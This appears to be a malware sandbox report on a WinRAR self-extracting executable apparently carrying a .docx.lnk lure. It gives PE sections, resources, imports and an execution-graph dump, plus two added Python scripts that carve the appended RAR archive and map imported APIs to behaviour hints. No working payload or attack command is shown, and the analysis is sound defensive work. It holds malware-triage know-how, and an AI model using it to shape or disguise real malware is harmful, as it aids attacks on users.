IMAGE_DIRECTORY_ENTRY_BASERELOC      0x74000          0x23dc        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          0x3c1b0          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS            0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    0x366a8          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT            0x34000          0x278         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   0x3d85c          0x120         .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED       0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text   0x1000           0x32dbc       0x32e00   59fca22eb14bf065790ccabf936fb764  False     0.5921807816339066   data       6.705384121865264   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x34000          0xb1d0        0xb200    3d7416119125f570d6c385b5ba208d7a  False     0.46034497893258425  data       5.270635796862559   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x40000          0x24750       0x1200    edc39ed5cd62e969c2b4607a1a95cf98  False     0.4058159722222222   data       4.083550519415643   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat  0x65000          0x1a4         0x200     185ed7102f068a73891dd850643e3d14  False     0.46484375           data       3.50335535460232    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x66000          0xdff8        0xe000    699399d7d2e63f9a36984a221fc02f75  False     0.6373465401785714   data       6.63871928699419    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x74000          0x23dc        0x2400    539b0c53eda4d1d9ffe2e69d5037d71f  False     0.7864583333333334   data       6.678617573231213   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
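The PDB path sfxrar.pdb, the `__tmp_rar_sfx_access_check_` probe file and the sfxname/sfxstime/STARTDLG arguments all identify the executable as a stock WinRAR SFX stub, so the payload is a RAR archive appended after the last section rather than anything inside the sections above. The raw sizes in the table sum to 325,632 bytes; assuming the usual 0x400 bytes of headers, roughly 5 KB of the 331,935-byte file is that appended archive. The script below is an added example, not code from the report or from WinRAR: it parses the section table to find where the overlay begins, looks for the RAR4/RAR5 signature there, and decodes the link timestamp. The PE it constructs to exercise itself is a one-section stand-in that reuses this sample's timestamp 0x6474CCD4; pass a file path as argv[1] to run it on a real SFX. Note what the timestamp means here: it dates the SFX module shipped with WinRAR, not the moment the attacker packaged the archive.

```python
import struct
from datetime import datetime, timezone

RAR4_MARKER = b"Rar!\x1a\x07\x00"
RAR5_MARKER = b"Rar!\x1a\x07\x01\x00"


def pe_layout(data):
    """Return (link timestamp, number of sections, end offset of the last section's raw data)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    sect = coff + 20 + opt_size
    end = 0
    for i in range(nsect):
        # IMAGE_SECTION_HEADER: SizeOfRawData and PointerToRawData sit at offsets 16 and 20
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return timestamp, nsect, end


def find_rar_overlay(data):
    """Locate a RAR archive appended after the last PE section (the SFX payload)."""
    timestamp, nsect, overlay_start = pe_layout(data)
    overlay = data[overlay_start:]
    result = {
        "link_time": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "sections": nsect,
        "overlay_offset": overlay_start,
        "overlay_size": len(overlay),
        "rar_version": None,
        "rar_offset": None,
    }
    for version, marker in (("RAR5", RAR5_MARKER), ("RAR4", RAR4_MARKER)):
        idx = overlay.find(marker)
        if idx != -1:
            result["rar_version"] = version
            result["rar_offset"] = overlay_start + idx
            break
    return result


def carve(data, out_path):
    """Write the embedded archive to disk so it can be listed with unrar or 7z."""
    info = find_rar_overlay(data)
    if info["rar_offset"] is None:
        raise ValueError("no RAR marker in overlay")
    with open(out_path, "wb") as fh:
        fh.write(data[info["rar_offset"]:])
    return info


def build_synthetic_sfx(payload, timestamp=0x6474CCD4):
    """Constructed minimal 32-bit PE (one section, no optional header) with `payload` appended.
    The default timestamp is the one this report lists, so the decode can be checked."""
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x0102)
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x10, 0x1000, 0x10, 0x80, 0, 0, 0, 0, 0x60000020)
    body = b"\xCC" * 0x10                                            # raw data at file offset 0x80
    return dos + coff + section + body + payload


# Constructed input: a RAR5 signature plus filler, not the sample's real archive.
SAMPLE_SFX = build_synthetic_sfx(RAR5_MARKER + b"\x00" * 64)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_SFX
    print(find_rar_overlay(data))
```

On the real sample the overlay starts where .reloc's raw data ends; once carved, `unrar l` or `7z l` on the output lists the archive members, which for this sample should include the 7,271-byte .docx.lnk described above. A marker found inside a section rather than in the overlay would point to a different packaging and is worth a second look.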
Name           RVA      Size    Type                                                                                                               Language  Country        ZLIB Complexity
PNG            0x66650  0xb45   PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced                                                          English   United States  1.0027729636048528
PNG            0x67198  0x15a9  PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced                                                         English   United States  0.9363390441839495
RT_ICON        0x68748  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors   English   United States  0.47832369942196534
RT_ICON        0x68cb0  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors  English   United States  0.5410649819494585
RT_ICON        0x69558  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors  English   United States  0.4933368869936034
RT_ICON        0x6a400  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m                       English   United States  0.5390070921985816
RT_ICON        0x6a868  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m                       English   United States  0.41393058161350843
RT_ICON        0x6b910  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m                       English   United States  0.3479253112033195
RT_ICON        0x6deb8  0x3d71  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                                        English   United States  0.9809269502193401
RT_DIALOG      0x72588  0x286   data                                                                                                               English   United States  0.5092879256965944
RT_DIALOG      0x72358  0x13a   data                                                                                                               English   United States  0.60828025477707
RT_DIALOG      0x72498  0xec    data                                                                                                               English   United States  0.6991525423728814
RT_DIALOG      0x72228  0x12e   data                                                                                                               English   United States  0.5927152317880795
RT_DIALOG      0x71ef0  0x338   data                                                                                                               English   United States  0.45145631067961167
RT_DIALOG      0x71c98  0x252   data                                                                                                               English   United States  0.5757575757575758
RT_STRING      0x72f68  0x1e2   data                                                                                                               English   United States  0.3900414937759336
RT_STRING      0x73150  0x1cc   data                                                                                                               English   United States  0.4282608695652174
RT_STRING      0x73320  0x1b8   data                                                                                                               English   United States  0.45681818181818185
RT_STRING      0x734d8  0x146   data                                                                                                               English   United States  0.5153374233128835
RT_STRING      0x73620  0x46c   data                                                                                                               English   United States  0.3454063604240283
RT_STRING      0x73a90  0x166   data                                                                                                               English   United States  0.49162011173184356
RT_STRING      0x73bf8  0x152   data                                                                                                               English   United States  0.5059171597633136
RT_STRING      0x73d50  0x10a   data                                                                                                               English   United States  0.49624060150375937
RT_STRING      0x73e60  0xbc    data                                                                                                               English   United States  0.6329787234042553
RT_STRING      0x73f20  0xd6    data                                                                                                               English   United States  0.5747663551401869
RT_GROUP_ICON  0x71c30  0x68    data                                                                                                               English   United States  0.7019230769230769
RT_MANIFEST    0x72810  0x753   XML 1.0 document, ASCII text, with CRLF line terminators                                                           English   United States  0.3957333333333333
DLL: Import
KERNEL32.dll: GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll: SysAllocString, SysFreeString, VariantClear
gdiplus.dll: GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
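Triage note on reading this table: several of the "interesting" KERNEL32 imports (IsDebuggerPresent, GetProcessHeap, IsProcessorFeaturePresent, InitializeSListHead, UnhandledExceptionFilter) are pulled in by the MSVC C runtime's startup code, so on their own they are weak evidence of anti-analysis; the LoadLibrary*/GetProcAddress pair matters more, because it means the static import table is only a lower bound on what the binary can call. The script below is an added example, not part of the Joe Sandbox report and not its signature engine: it parses an import table written in the "DLL: function, function" form used above and groups the imports into behaviour hints. The embedded table is a constructed subset of this sample's KERNEL32/OLEAUT32/gdiplus rows, and the API-to-behaviour mapping is the editor's own heuristic.

```python
"""Map a flattened 'DLL: Import' table to behaviour hints.

Added example; not code from Joe Sandbox. The table below is a constructed
excerpt of the import rows shown on this page, and API_HINTS is a hypothetical
triage mapping, not the sandbox's own signature logic.
"""
from __future__ import annotations

import re
from collections import defaultdict

# Constructed excerpt of the import table on this page (subset of the real rows).
IMPORT_TABLE = """\
KERNEL32.dll: GetLastError, DeviceIoControl, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, \
IsDebuggerPresent, GetProcessHeap, SetThreadExecutionState, GetLocaleInfoW, GetTempPathW, \
MoveFileExW, CreateHardLinkW, SetFileAttributesW, VirtualProtect, LoadLibraryExA, GetProcAddress
OLEAUT32.dll: SysAllocString, SysFreeString, VariantClear
gdiplus.dll: GdipCreateBitmapFromStream, GdiplusStartup
"""

# Hypothetical mapping from imported API to the behaviour it hints at.
API_HINTS = {
    "IsDebuggerPresent": "anti-debug: direct debugger check (also imported by the MSVC CRT)",
    "GetProcessHeap": "anti-debug: heap flags readable (weak signal, CRT imports it too)",
    "DeviceIoControl": "device-driver communication",
    "GetLocaleInfoW": "locale query (possible geofencing)",
    "SetThreadExecutionState": "keeps the system awake while running",
    "CreateFileMappingW": "file/section mapping",
    "MapViewOfFile": "file/section mapping",
    "MoveFileExW": "delayed file move/rename (can be deferred to reboot)",
    "SetFileAttributesW": "can hide or alter attributes of dropped files",
    "VirtualProtect": "changes memory protection (loader/unpacker signal)",
    "LoadLibraryExA": "dynamic library loading",
    "GetProcAddress": "dynamic API resolution",
}

_ROW = re.compile(r"^\s*([\w.\-]+\.dll)\s*:\s*(.*)$", re.IGNORECASE)


def parse_import_table(text: str) -> dict[str, list[str]]:
    """Return {dll: [api, ...]} from lines of the form 'NAME.dll: a, b, c'."""
    imports: dict[str, list[str]] = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue  # header rows such as 'DLL: Import' or blank lines
        dll, apis = m.group(1), m.group(2)
        imports[dll] = [a.strip() for a in apis.split(",") if a.strip()]
    return imports


def behaviour_hints(imports: dict[str, list[str]]) -> dict[str, list[tuple[str, str]]]:
    """Group imports by the behaviour they hint at: {hint: [(dll, api), ...]}."""
    hints: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for dll, apis in imports.items():
        for api in apis:
            if api in API_HINTS:
                hints[API_HINTS[api]].append((dll, api))
    return dict(hints)


def dynamic_resolution_possible(imports: dict[str, list[str]]) -> bool:
    """True when LoadLibrary* and GetProcAddress are both imported.

    In that case the static table is only a lower bound on the APIs the
    binary can reach, so dynamic analysis (or string/IAT reconstruction)
    is needed to see the rest.
    """
    apis = {a for lst in imports.values() for a in lst}
    return "GetProcAddress" in apis and any(a.startswith("LoadLibrary") for a in apis)


if __name__ == "__main__":
    table = parse_import_table(IMPORT_TABLE)
    for hint, pairs in sorted(behaviour_hints(table).items()):
        print(f"{hint}: {', '.join(api for _, api in pairs)}")
    print("dynamic API resolution possible:", dynamic_resolution_possible(table))
```

The hint table is deliberately small; the point is that an import-based signature is only a starting list of capabilities, and the hits that come from the CRT should be discounted before anything is concluded about anti-analysis behaviour.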
Language of compilation system: English
Country where language is spoken: United States
No network behavior found

Target ID:0
Start time:09:36:17
Start date:30/09/2024
Path:C:\Users\user\Desktop\oJK2UKac7G.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\oJK2UKac7G.exe"
Imagebase:0xc90000
File size:331'935 bytes
MD5 hash:F708711B3C0F40E0202645136934EE1A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true


    Execution Graph

    Execution Coverage:9.1%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:10.2%
    Total number of Nodes:1522
    Total number of Limit Nodes:48
    execution_graph: [graph dump omitted; it is the textual export of the interactive execution-graph widget and is not readable as text. Recoverable content: starting from the first listed node (cac9c0), the traced code is a dialog routine (GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, SendMessageW, DialogBoxParamW, ShowWindow, SetWindowTextW, SHAutoComplete, SHGetMalloc) that reads its own image path and command line (GetModuleFileNameW, GetCommandLineW), checks and creates the destination directory (GetCurrentDirectoryW, GetFileAttributesW, CreateDirectoryW, SetCurrentDirectoryW), maps the input file (CreateFileMappingW, MapViewOfFile, UnmapViewOfFile), enumerates and writes files (FindFirstFileW/FindNextFileW, CreateFileW, SetFilePointer, SetEndOfFile, FlushFileBuffers, SetFileTime, SetFileAttributesW, DeleteFileW, MoveFileW/MoveFileExW) and keeps the system awake meanwhile (SetThreadExecutionState); error paths run through GetLastError, RaiseException and the CRT exception machinery (__InternalCxxFrameHandler, Concurrency::cancel_current_task). Small disconnected subgraphs cover CRT helpers (CatchGuardHandler, QueryPerformanceFrequency/QueryPerformanceCounter, GetCPInfo/IsDBCSLeadByte, GetProcessHeap, LocalFree, CloseHandle).]
NtdllDefWindowProc_W 25775->25776 25777 cab08f SetWindowLongW 25775->25777 25780 caa812 25777->25780 25779 cab0a8 25779->25776 25781 cafeae 27 API calls 25780->25781 25782 caa829 25781->25782 25784 caa859 25782->25784 25785 cab0be CLSIDFromString CoCreateInstance 25782->25785 25784->25779 25786 cab0f6 25785->25786 25786->25784 26084 cbb580 21 API calls 2 library calls 26107 cb3a80 6 API calls 4 library calls 26123 cb0780 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26086 caf59f 14 API calls ___delayLoadHelper2@8 26087 cad8c6 109 API calls 4 library calls 26051 caa490 GetClientRect CopyRect 26052 cbd090 GetCommandLineA GetCommandLineW 26053 c91095 44 API calls 26125 cac7a0 110 API calls 26126 cb0eff 9 API calls 2 library calls 25983 cbbda0 25985 cbbdab 25983->25985 25986 cbbdd4 25985->25986 25987 cbbdd0 25985->25987 25989 cbc0ba 25985->25989 25996 cbbe00 DeleteCriticalSection 25986->25996 25990 cbbe48 __dosmaperr 5 API calls 25989->25990 25991 cbc0e1 25990->25991 25992 cbc0ea 25991->25992 25993 cbc0ff InitializeCriticalSectionAndSpinCount 25991->25993 25994 cb0d6c CatchGuardHandler 5 API calls 25992->25994 25993->25992 25995 cbc116 25994->25995 25995->25985 25996->25987 26128 cad8c6 103 API calls 4 library calls 26089 cad8c6 98 API calls 4 library calls 26055 cbb8b0 21 API calls 26056 cb9cb0 7 API calls ___scrt_uninitialize_crt 26037 c910b5 26038 c9644d 43 API calls 26037->26038 26039 c910ba 26038->26039 26042 cb0362 29 API calls 26039->26042 26041 c910c4 26042->26041 26090 cc3db0 VariantClear 26129 cc03b0 51 API calls 24071 cafd48 24072 cafd52 24071->24072 24075 caf9d9 24072->24075 24101 caf737 24075->24101 24077 caf9e9 24078 cafa46 24077->24078 24082 cafa6a 24077->24082 24079 caf977 DloadReleaseSectionWriteAccess 6 API calls 24078->24079 24080 cafa51 RaiseException 24079->24080 24095 cafc3f 24080->24095 24081 cafb55 24086 cafc11 24081->24086 24088 cafbb3 GetProcAddress 24081->24088 24082->24081 
24083 cafae2 LoadLibraryExA 24082->24083 24084 cafb43 24082->24084 24082->24086 24083->24084 24085 cafaf5 GetLastError 24083->24085 24084->24081 24089 cafb4e FreeLibrary 24084->24089 24087 cafb1e 24085->24087 24097 cafb08 24085->24097 24110 caf977 24086->24110 24090 caf977 DloadReleaseSectionWriteAccess 6 API calls 24087->24090 24088->24086 24091 cafbc3 GetLastError 24088->24091 24089->24081 24092 cafb29 RaiseException 24090->24092 24098 cafbd6 24091->24098 24092->24095 24094 caf977 DloadReleaseSectionWriteAccess 6 API calls 24096 cafbf7 RaiseException 24094->24096 24099 caf737 ___delayLoadHelper2@8 6 API calls 24096->24099 24097->24084 24097->24087 24098->24086 24098->24094 24100 cafc0e 24099->24100 24100->24086 24102 caf769 24101->24102 24103 caf743 24101->24103 24102->24077 24118 caf7e0 24103->24118 24105 caf748 24106 caf764 24105->24106 24121 caf909 24105->24121 24126 caf76a GetModuleHandleW GetProcAddress GetProcAddress 24106->24126 24109 caf9b2 24109->24077 24111 caf9ab 24110->24111 24112 caf989 24110->24112 24111->24095 24113 caf7e0 DloadReleaseSectionWriteAccess 3 API calls 24112->24113 24114 caf98e 24113->24114 24115 caf9a6 24114->24115 24116 caf909 DloadProtectSection 3 API calls 24114->24116 24129 caf9ad GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24115->24129 24116->24115 24127 caf76a GetModuleHandleW GetProcAddress GetProcAddress 24118->24127 24120 caf7e5 24120->24105 24122 caf91e DloadProtectSection 24121->24122 24123 caf924 24122->24123 24124 caf959 VirtualProtect 24122->24124 24128 caf81f VirtualQuery GetSystemInfo 24122->24128 24123->24106 24124->24123 24126->24109 24127->24120 24128->24124 24129->24111 26057 cab440 GdipCloneImage GdipAlloc 26130 cae740 71 API calls 26091 cb1540 51 API calls 2 library calls 26061 c9a850 81 API calls Concurrency::cancel_current_task 26093 c96950 41 API calls __EH_prolog 26062 caa450 IsWindow 26063 cac450 101 API calls 26064 cbb850 31 API calls 2 library calls 26110 cbb650 71 API 
calls _free 26111 cafe51 48 API calls _unexpected 26112 cc1a50 IsProcessorFeaturePresent 26132 cbc368 27 API calls 4 library calls 26113 cb3e7b 38 API calls 4 library calls 26097 c92570 97 API calls 26067 ca8870 133 API calls 26098 cb1170 RaiseException Concurrency::cancel_current_task _com_error::_com_error 25286 c91075 25287 ca04e5 41 API calls 25286->25287 25288 c9107a 25287->25288 25291 cb0362 29 API calls 25288->25291 25290 c91084 25291->25290 25295 c9b20a 25296 c9b21f 25295->25296 25298 c9b218 25295->25298 25297 c9b22c GetStdHandle 25296->25297 25305 c9b23b 25296->25305 25297->25305 25299 c9b293 WriteFile 25299->25305 25300 c9b25f 25301 c9b264 WriteFile 25300->25301 25300->25305 25301->25300 25301->25305 25303 c9b325 25307 c97951 78 API calls 25303->25307 25305->25298 25305->25299 25305->25300 25305->25301 25305->25303 25306 c9765a 79 API calls 25305->25306 25306->25305 25307->25298 25309 cb0602 25310 cb060e ___scrt_is_nonwritable_in_current_image 25309->25310 25341 cb019c 25310->25341 25312 cb0615 25313 cb0768 25312->25313 25316 cb063f 25312->25316 25418 cb09fa 4 API calls 2 library calls 25313->25418 25315 cb076f 25411 cb930a 25315->25411 25328 cb067e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25316->25328 25352 cb9ead 25316->25352 25323 cb065e 25325 cb06df 25360 cb0b15 GetStartupInfoW __cftof 25325->25360 25327 cb06e5 25361 cb9dfe 51 API calls 25327->25361 25328->25325 25414 cb8dfc 38 API calls 2 library calls 25328->25414 25331 cb06ed 25362 caf04c 25331->25362 25335 cb0701 25335->25315 25336 cb0705 25335->25336 25337 cb070e 25336->25337 25416 cb92ad 28 API calls _abort 25336->25416 25417 cb030d 12 API calls ___scrt_uninitialize_crt 25337->25417 25340 cb0716 25340->25323 25342 cb01a5 25341->25342 25420 cb0816 IsProcessorFeaturePresent 25342->25420 25344 cb01b1 25421 cb3bde 25344->25421 25346 cb01b6 25347 cb01ba 25346->25347 25429 cb9d37 25346->25429 25347->25312 25350 cb01d1 25350->25312 25355 cb9ec4 25352->25355 25353 cb0d6c 
CatchGuardHandler 5 API calls 25354 cb0658 25353->25354 25354->25323 25356 cb9e51 25354->25356 25355->25353 25357 cb9e80 25356->25357 25358 cb0d6c CatchGuardHandler 5 API calls 25357->25358 25359 cb9ea9 25358->25359 25359->25328 25360->25327 25361->25331 25478 ca1b7c 25362->25478 25366 caf06c 25527 cabd0b 25366->25527 25368 caf075 __cftof 25369 caf088 GetCommandLineW 25368->25369 25370 caf09b 25369->25370 25371 caf12c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25369->25371 25531 cad6f8 25370->25531 25373 c94a20 _swprintf 51 API calls 25371->25373 25374 caf193 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25373->25374 25542 cac8bd LoadBitmapW 25374->25542 25377 caf0a9 OpenFileMappingW 25381 caf11d CloseHandle 25377->25381 25382 caf0c1 MapViewOfFile 25377->25382 25378 caf126 25536 caed1e 25378->25536 25381->25371 25384 caf0d2 __InternalCxxFrameHandler 25382->25384 25385 caf116 UnmapViewOfFile 25382->25385 25388 caed1e 2 API calls 25384->25388 25385->25381 25390 caf0ee 25388->25390 25572 ca0695 83 API calls 25390->25572 25391 caa0c7 27 API calls 25393 caf1f3 DialogBoxParamW 25391->25393 25397 caf22d 25393->25397 25394 caf102 25573 ca074b 83 API calls _wcslen 25394->25573 25396 caf10d 25396->25385 25398 caf23f Sleep 25397->25398 25399 caf246 25397->25399 25398->25399 25402 caf254 25399->25402 25574 cabfa3 CompareStringW SetCurrentDirectoryW __cftof _wcslen 25399->25574 25401 caf273 DeleteObject 25403 caf288 DeleteObject 25401->25403 25404 caf28f 25401->25404 25402->25401 25403->25404 25405 caf2d2 25404->25405 25406 caf2c0 25404->25406 25569 cabd71 25405->25569 25575 caed7b 6 API calls 25406->25575 25408 caf2c6 CloseHandle 25408->25405 25410 caf30c 25415 cb0b4b GetModuleHandleW 25410->25415 25707 cb9087 25411->25707 25414->25325 25415->25335 25416->25337 25417->25340 25418->25315 25420->25344 25433 cb4c87 25421->25433 25424 cb3be7 25424->25346 25426 cb3bef 25427 cb3bfa 25426->25427 25447 cb4cc3 DeleteCriticalSection 25426->25447 25427->25346 25474 
cbd20a 25429->25474 25432 cb3bfd 7 API calls 2 library calls 25432->25347 25434 cb4c90 25433->25434 25436 cb4cb9 25434->25436 25438 cb3be3 25434->25438 25448 cb4ecc 25434->25448 25453 cb4cc3 DeleteCriticalSection 25436->25453 25438->25424 25439 cb3d0c 25438->25439 25467 cb4ddd 25439->25467 25443 cb3d3c 25443->25426 25444 cb3d2f 25444->25443 25473 cb3d3f 6 API calls ___vcrt_FlsFree 25444->25473 25446 cb3d21 25446->25426 25447->25424 25454 cb4cf2 25448->25454 25451 cb4f04 InitializeCriticalSectionAndSpinCount 25452 cb4eef 25451->25452 25452->25434 25453->25438 25455 cb4d13 25454->25455 25456 cb4d0f 25454->25456 25455->25456 25458 cb4d7b GetProcAddress 25455->25458 25460 cb4d6c 25455->25460 25462 cb4d92 LoadLibraryExW 25455->25462 25456->25451 25456->25452 25458->25456 25459 cb4d89 25458->25459 25459->25456 25460->25458 25461 cb4d74 FreeLibrary 25460->25461 25461->25458 25463 cb4dd9 25462->25463 25464 cb4da9 GetLastError 25462->25464 25463->25455 25464->25463 25465 cb4db4 ___vcrt_FlsSetValue 25464->25465 25465->25463 25466 cb4dca LoadLibraryExW 25465->25466 25466->25455 25468 cb4cf2 ___vcrt_FlsSetValue 5 API calls 25467->25468 25469 cb4df7 25468->25469 25470 cb4e10 TlsAlloc 25469->25470 25471 cb3d16 25469->25471 25471->25446 25472 cb4e8e 6 API calls ___vcrt_FlsSetValue 25471->25472 25472->25444 25473->25446 25477 cbd223 25474->25477 25475 cb0d6c CatchGuardHandler 5 API calls 25476 cb01c3 25475->25476 25476->25350 25476->25432 25477->25475 25479 caffc0 25478->25479 25480 ca1b86 GetModuleHandleW 25479->25480 25481 ca1c00 25480->25481 25482 ca1ba1 GetProcAddress 25480->25482 25483 ca1f2d GetModuleFileNameW 25481->25483 25585 cb89de 42 API calls 2 library calls 25481->25585 25484 ca1bba 25482->25484 25485 ca1bd2 GetProcAddress 25482->25485 25494 ca1f4b 25483->25494 25484->25485 25487 ca1be4 25485->25487 25487->25481 25488 ca1e6d 25488->25483 25489 ca1e78 GetModuleFileNameW CreateFileW 25488->25489 25490 ca1ea8 SetFilePointer 25489->25490 25491 ca1f21 CloseHandle 
25489->25491 25490->25491 25492 ca1eb6 ReadFile 25490->25492 25491->25483 25492->25491 25500 ca1ed4 25492->25500 25496 ca1fad GetFileAttributesW 25494->25496 25497 ca1fc5 25494->25497 25499 ca1f76 CompareStringW 25494->25499 25576 c9c619 25494->25576 25579 ca1b34 25494->25579 25496->25494 25496->25497 25501 ca1fd0 25497->25501 25503 ca2005 25497->25503 25498 ca1b34 2 API calls 25498->25500 25499->25494 25500->25491 25500->25498 25504 ca1fe9 GetFileAttributesW 25501->25504 25506 ca2001 25501->25506 25502 ca2114 25526 cab64d GetCurrentDirectoryW 25502->25526 25503->25502 25505 c9c619 GetVersionExW 25503->25505 25504->25501 25504->25506 25507 ca201f 25505->25507 25506->25503 25508 ca208c 25507->25508 25509 ca2026 25507->25509 25510 c94a20 _swprintf 51 API calls 25508->25510 25511 ca1b34 2 API calls 25509->25511 25512 ca20b4 AllocConsole 25510->25512 25513 ca2030 25511->25513 25514 ca210c ExitProcess 25512->25514 25515 ca20c1 GetCurrentProcessId AttachConsole 25512->25515 25516 ca1b34 2 API calls 25513->25516 25586 cb4f93 25515->25586 25518 ca203a 25516->25518 25520 c9f937 53 API calls 25518->25520 25519 ca20e2 GetStdHandle WriteConsoleW Sleep FreeConsole 25519->25514 25521 ca2055 25520->25521 25522 c94a20 _swprintf 51 API calls 25521->25522 25523 ca2068 25522->25523 25524 c9f937 53 API calls 25523->25524 25525 ca2077 25524->25525 25525->25514 25526->25366 25528 ca1b34 2 API calls 25527->25528 25529 cabd1f OleInitialize 25528->25529 25530 cabd42 